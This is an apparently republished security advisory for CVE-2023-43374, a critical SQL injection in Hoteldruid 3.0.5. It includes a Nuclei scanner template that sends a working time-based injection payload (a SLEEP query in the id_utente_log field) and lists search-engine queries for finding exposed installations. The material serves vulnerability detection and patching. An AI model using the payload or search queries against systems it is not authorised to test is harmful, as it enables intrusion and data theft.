
Hoteldruid v3.0.5 - SQL Injection

Published: 2024-05-09 11:33:01
Source: ProjectDiscovery (github.com)
Tags: hoteldruid, sqlinjection, vulnerability, sensitive data, system takeover, upgrade

CVSS3: 9.8
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.01
Percentile: 83.6%

Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.

Nuclei template:

id: CVE-2023-43374

info:
  name: Hoteldruid v3.0.5 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive data or complete takeover of the affected system.
  remediation: |
    Upgrade Hoteldruid to a patched version that addresses the SQL Injection vulnerability.
  reference:
    - https://flashy-lemonade-192.notion.site/SQL-injection-in-hoteldruid-version-3-0-5-via-id_utente_log-parameter-8b89f014004947e7bd2ecdacf1610cf9
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43374
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-43374
    cwe-id: CWE-89
    epss-score: 0.00735
    epss-percentile: 0.80777
    cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: digitaldruid
    product: hoteldruid
    shodan-query:
      - title:"HotelDruid"
      - http.title:"hoteldruid"
      - http.favicon.hash:-1521640213
    fofa-query:
      - title="HotelDruid"
      - title="hoteldruid"
      - icon_hash=-1521640213
    google-query: intitle:"hoteldruid"
  tags: cve,cve2023,hoteldruid,cms,sqli,digitaldruid
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /hoteldruid/inizio.php HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: word
        part: body
        words:
          - "HotelDruid</a>"
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /hoteldruid/personalizza.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        aggiorna_qualcosa=SI&anno=2023&attiva_phpr_log=Enable&id_sessione=1&id_utente_log=0'%2b(SELECT%207151%20FROM%20(SELECT(SLEEP(5)))EAXh)%2b'&id_utente_mod=1

    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code == 200'
          - 'contains(body, "HotelDruid:")'
        condition: and
# digest: 4a0a00473045022100ed2d51a5b859e168d3fc27ac78f51230ab105242084cf9831ea4b902476c839102206db1002120c87c478ebee22051057ab49b28ac5e09ce3df92c36d34fff1e7e6c:922c64590222798bb761d5b6d8e72950
